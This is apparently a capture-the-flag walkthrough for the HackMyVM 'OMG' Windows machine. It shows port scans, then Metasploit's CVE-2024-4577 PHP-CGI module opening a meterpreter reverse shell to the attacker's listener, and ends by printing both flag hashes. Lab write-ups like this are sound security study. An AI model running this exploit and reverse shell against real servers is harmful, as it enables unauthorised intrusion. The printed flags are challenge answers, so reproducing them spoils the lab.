HackMyVM-OMG-Walkthrough
城南花已开 Lv6

Information Gathering

Service Detection

This target is not difficult: it is a Windows machine, and msf is enough to take it directly.

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.207 00:0c:29:be:91:8f VMware, Inc.
192.168.60.254 00:50:56:e5:e5:eb VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.123 seconds (120.58 hosts/sec). 4 responded
export ip=192.168.60.207
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Port scanning: Making networking exciting since... whenever.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.207:80
Open 192.168.60.207:135
Open 192.168.60.207:139
Open 192.168.60.207:443
Open 192.168.60.207:445
Open 192.168.60.207:5985
Open 192.168.60.207:47001
Open 192.168.60.207:49664
Open 192.168.60.207:49665
Open 192.168.60.207:49666
Open 192.168.60.207:49667
Open 192.168.60.207:49668
Open 192.168.60.207:49670
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 22:36 CST
Initiating ARP Ping Scan at 22:36
Scanning 192.168.60.207 [1 port]
Completed ARP Ping Scan at 22:36, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:36
Completed Parallel DNS resolution of 1 host. at 22:36, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:36
Scanning 192.168.60.207 [13 ports]
Discovered open port 135/tcp on 192.168.60.207
Discovered open port 443/tcp on 192.168.60.207
Discovered open port 80/tcp on 192.168.60.207
Discovered open port 445/tcp on 192.168.60.207
Discovered open port 49665/tcp on 192.168.60.207
Discovered open port 5985/tcp on 192.168.60.207
Discovered open port 49666/tcp on 192.168.60.207
Discovered open port 49668/tcp on 192.168.60.207
Discovered open port 49670/tcp on 192.168.60.207
Discovered open port 139/tcp on 192.168.60.207
Discovered open port 47001/tcp on 192.168.60.207
Discovered open port 49664/tcp on 192.168.60.207
Discovered open port 49667/tcp on 192.168.60.207
Completed SYN Stealth Scan at 22:36, 0.06s elapsed (13 total ports)
Nmap scan report for 192.168.60.207
Host is up, received arp-response (0.00032s latency).
Scanned at 2025-02-26 22:36:17 CST for 0s

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 128
135/tcp open msrpc syn-ack ttl 128
139/tcp open netbios-ssn syn-ack ttl 128
443/tcp open https syn-ack ttl 128
445/tcp open microsoft-ds syn-ack ttl 128
5985/tcp open wsman syn-ack ttl 128
47001/tcp open winrm syn-ack ttl 128
49664/tcp open unknown syn-ack ttl 128
49665/tcp open unknown syn-ack ttl 128
49666/tcp open unknown syn-ack ttl 128
49667/tcp open unknown syn-ack ttl 128
49668/tcp open unknown syn-ack ttl 128
49670/tcp open unknown syn-ack ttl 128
MAC Address: 00:0C:29:BE:91:8F (VMware)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
Raw packets sent: 14 (600B) | Rcvd: 14 (600B)

We can see the target's notes:

[image]

Go straight to Orange Tsai's blog.

Exploiting this CVE is all it takes.

[image]

User Privilege Escalation

Search for the exploit in msfconsole and run it to get a shell.

❯ msfconsole
Metasploit tip: Network adapter names can be used for IP options set LHOST
eth0

IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'

I love shells --egypt


=[ metasploit v6.4.38-dev ]
+ -- --=[ 2467 exploits - 1273 auxiliary - 431 post ]
+ -- --=[ 1478 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search cve 4577

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/exchange_ecp_dlp_policy 2021-01-12 excellent Yes Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE
1 exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577 2024-06-06 excellent Yes PHP CGI Argument Injection Remote Code Execution
2 \_ target: Windows PHP . . . .
3 \_ target: Windows Command . . . .


Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command'

msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options

Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /php-cgi/php-cgi.exe yes The path to a PHP CGI endpoint
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.60.100 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows PHP



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set RHOSTS 192.168.60.207
RHOSTS => 192.168.60.207
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > exploit

[*] Started reverse TCP handler on 192.168.60.100:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Apache
[*] Sending stage (40004 bytes) to 192.168.60.207
[*] Meterpreter session 3 opened (192.168.60.100:4444 -> 192.168.60.207:49706) at 2025-02-26 22:53:37 +0800

meterpreter > help

Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel


Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory (alias for lpwd)
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
ldir List local files (alias for lls)
lls List local files
lmkdir Create new directory on local machine
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory


Stdapi: Networking Commands
===========================

Command Description
------- -----------
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target


Stdapi: System Commands
=======================

Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS


Stdapi: Audio Output Commands
=============================

Command Description
------- -----------
play play a waveform audio file (.wav) on the target system

For more info on a specific command, use <command> -h or help <command>.

meterpreter > cd ..
meterpreter > ls
Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2025-02-12 23:48:46 +0800 $WinREAgent
040555/r-xr-xr-x 4096 dir 2025-02-12 23:38:15 +0800 Documents and Settings
DumpStack.log.tmp
040777/rwxrwxrwx 0 dir 2021-05-08 16:15:05 +0800 PerfLogs
040555/r-xr-xr-x 4096 dir 2024-12-12 06:23:32 +0800 Program Files
040777/rwxrwxrwx 4096 dir 2021-05-08 17:34:13 +0800 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2025-02-12 23:41:29 +0800 ProgramData
040777/rwxrwxrwx 0 dir 2024-12-12 06:22:01 +0800 Recovery
040777/rwxrwxrwx 0 dir 2024-12-12 06:21:18 +0800 System Volume Information
040555/r-xr-xr-x 4096 dir 2025-02-12 23:38:15 +0800 Users
040777/rwxrwxrwx 12288 dir 2025-02-12 23:37:55 +0800 Windows
pagefile.sys
040777/rwxrwxrwx 12288 dir 2025-02-12 23:41:46 +0800 xampp

meterpreter > cd Users
meterpreter > ls
Listing: C:\Users
=================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2024-12-12 00:45:41 +0800 Administrator
040777/rwxrwxrwx 4096 dir 2025-02-12 23:41:29 +0800 All Users
040555/r-xr-xr-x 8192 dir 2024-12-12 06:22:00 +0800 Default
040555/r-xr-xr-x 8192 dir 2024-12-12 06:22:00 +0800 Default User
040555/r-xr-xr-x 4096 dir 2024-12-12 06:23:32 +0800 Public
040777/rwxrwxrwx 8192 dir 2025-02-12 23:42:30 +0800 admin
100666/rw-rw-rw- 174 fil 2021-05-08 16:14:03 +0800 desktop.ini

meterpreter > cd Administrator
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2024-12-12 06:23:32 +0800 desktop.ini
100666/rw-rw-rw- 33 fil 2025-02-13 00:25:14 +0800 root.txt
100666/rw-rw-rw- 33 fil 2025-02-13 00:25:05 +0800 user.txt

meterpreter > cat root.txt
af70e9322a562983e01a250ca84fe28d
meterpreter > cat user.txt
4dcd00d9b6c66a0eae4a30aa0c781406
